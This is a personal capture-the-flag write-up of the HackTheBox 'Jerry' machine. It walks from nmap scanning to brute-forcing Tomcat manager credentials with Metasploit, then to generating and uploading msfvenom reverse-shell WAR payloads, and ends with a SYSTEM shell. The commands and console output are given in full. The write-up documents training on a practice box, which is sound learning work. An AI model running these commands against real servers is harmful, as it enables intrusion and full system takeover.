HackTheBox: Jerry

01/13/2024

This is the third Windows box Im doing, after [[Blue]] and [[Legacy]]. These are the easiest of the easy as far as windows boxes go. Im still basically just blowing through them and looking at the writeup as soon as I get stuck. I dont feel bad about it since I have 0 experience with this os, so I dont mind getting a boost and just exposing myself to as much as possible.

Enumeration

That was weird. Multiple nmap scans showed the host as being down. I had to run the nmap option to check if host was up using sudo nmap -O 10.10.10.95, which finally showed that port 8080 (http-proxy) was open.

Okay. Let me add jerry and jerry.htb to /etc/hosts and then try navigating to the site.

Exploring the tomcat website

http://jerry.htb:8080 brings us to a Tomcat test page.

using curl -s http://jerry.htb:8080/docs/ | grep Tomcat, we find that it's running Tomcat 7.0.88.

Lets use metasploit's Tomcat manager bruteforcer:

msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > use auxiliary/scanner/http/tomcat_mgr_login 

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.10.10.95                                
RHOSTS => 10.10.10.95                                                                                 
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit    

<SNIP>
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
</SNIP>

Note that this success was buried in a sea of failures,as is often the case in life and in computers. Anyway yeah, we got manager creds.

With these, going forward, we can upload a WAR file and gain RCE or a revshell.

Getting RCE through the manager page

Im in to the manager page with the credentials tomcat:s3cret.

We get some juicy details about the target system from this page: - Windows Server 2012 R2 - Windows OS 6.3 - amd64 - Hostname: JERRY

I may as well learn how to use msfvenom to generate a WAR shell. We'll resort to trusty tldr:

$ tldr msfvenom

  List payloads:

      msfvenom -l payloads

  List formats:

      msfvenom -l formats

Lets first see what formats we can choose from:

$ msfvenom -l formats

Framework Executable Formats [--format <value>]    
===============================================                          
    Name               
    ----                                           
    asp                                        
    aspx                                       
    aspx-exe                                       
    axis2     
    dll    
    ducky-script-psh
    elf   
    elf-so  
    exe       
    exe-only
    exe-service     
    exe-small
    hta-psh
    jar          
    jsp     
    loop-vbs                                       
    macho                                          
    msi                                                                                               
    msi-nouac    
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

"war" is going to be the format we want, which I know from past experience with Tomcat (from Thales, which was the very first box I did on my own). Its some kind of java-based archive, but I dont remember exactly what it stands for.

So it looks like we'll want to use --format war in the command.

Now lets see what payloads we have at our disposal:

$ msfvenom -l payloads

<SNIP>
cmd/windows/powershell/meterpreter/reverse_tcp
</SNIP>
<SNIP>
windows/x64/meterpreter/reverse_tcp
</SNIP>

One of these two should work.

Back to tldr, it shows an example of generating a file as follows:

Create an EXE binary with a reverse TCP handler:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f exe -o path/to/binary.exe

We'll tweak this slightly to meet our needs. We swap exe for war and plug in our host details:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war -o ./payload.war

Then run msfconsole, and start a payload-less listener using use exploit/multi/handler, then set the LHOST and LPORT options, and run exploit to start it.

Now we have to upload the malicious file to the Tomcat server. We navigate to the List Applications tab, and then scroll down to the "WAR file to deploy". Upload the newly-created malicious file.

No luck.

After a bunch of trial and error, I wound up having success with this shell I found online by googling "msfvenom webshell":

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Then I ran the exploit/multi/handler in msfconsole to set up a meterpreter listener.

Then I uploaded the shell.war file and FINALLY got a shell:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.24:4444 
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.95:49192) at 2023-10-13 17:55:50 -0400


Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
          

C:\apache-tomcat-7.0.88>pwd
pwd

C:\apache-tomcat-7.0.88>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\apache-tomcat-7.0.88

06/19/2018  04:07 AM    <DIR>          .
06/19/2018  04:07 AM    <DIR>          ..
06/19/2018  04:06 AM    <DIR>          bin
06/19/2018  06:47 AM    <DIR>          conf
06/19/2018  04:06 AM    <DIR>          lib
05/07/2018  02:16 PM            57,896 LICENSE
10/14/2023  06:39 AM    <DIR>          logs
05/07/2018  02:16 PM             1,275 NOTICE
05/07/2018  02:16 PM             9,600 RELEASE-NOTES
05/07/2018  02:16 PM            17,454 RUNNING.txt
06/19/2018  04:06 AM    <DIR>          temp
10/14/2023  07:55 AM    <DIR>          webapps
06/19/2018  04:34 AM    <DIR>          work
               4 File(s)         86,225 bytes
               9 Dir(s)   2,364,530,688 bytes free

C:\apache-tomcat-7.0.88>

and here's the best part:

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system